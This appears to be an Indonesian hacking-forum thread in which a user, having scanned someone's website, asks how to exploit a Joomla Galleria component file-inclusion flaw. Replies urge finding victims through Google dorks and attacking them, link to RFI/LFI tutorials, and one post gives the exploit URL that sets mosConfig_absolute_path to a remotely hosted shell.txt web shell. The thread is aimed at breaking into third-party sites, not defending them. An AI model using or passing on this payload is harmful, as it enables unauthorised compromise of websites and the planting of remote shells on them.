RFI dan LFI
#1
Asslamualaikum dan salam hangat untuk teman" backtracker's...

berhubung kepala ane dah puyeng Angry muter kesana kemari nyari refensi buwat remote file inclusion dan local file inclusion dan gak ngerti-ngerti...
ane mau nanya sama temen-temen, yang paham dengan salah satu vuln website tersebut...Tongue
setelah ane scan , ane dapat bugnya.

Info -> Component: Galleria File Inclusion Vulnerability
Versions Affected: Any
Check: /components/com_galleria/galleria.html.php
Exploit: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=
Vulnerable? Yes


kira-kira gimana tu temen-temen cara exploitnya..????Big Grin
mohon bantuannya...



#2
itu bug RFI ya..

klo kita cari aja dengan Dorknya dan tes cukup membuka website google apabila kebuka maka langsung HAJAR!!!

hehehehe ~_~"
Hidup Harus Di Bawa Happy..!!!

#3
iya om, tu ane scan salah satu web. dah dapat bug nya...
ngehajarnya tu gimana om,? tolong donk penjelasannya ...

#4
bisa kemari
http://forum.indonesianbacktrack.or.id/s...hlight=lfi

kemari
http://forum.indonesianbacktrack.or.id/s...hlight=rfi

kemari
http://www.hong.web.id/tutorial/cara-hac...-dan-lfi-2

kemari
http://hacker-cisadane.org/Thread-TUTOR-...FI-dan-LFI

#5
sama masih puyeng

#6
ijin nimbrung om biar nambah ilmuSmile
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


#7
[/quote]
Info -> Component: Galleria File Inclusion Vulnerability
Versions Affected: Any
Check: /components/com_galleria/galleria.html.php
Exploit: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=
Vulnerable? Yes


kira-kira gimana tu temen-temen cara exploitnya..????Big Grin
mohon bantuannya...

[/quote]

Ini RFI, jadi cara exploitnya, contoh sperti ini>> http://targetanda.com/components/com_gal...olute_path=[shell path]

Lebih jelas lagi seperti ini >> http://targetanda.com//components/com_ga.../shell.txt??

Di mana "shell.txt" itu adalah source shell nya dalam format .txt

Semoga bermanfaat Smile
Just a FireFLies






Users browsing this thread: 1 Guest(s)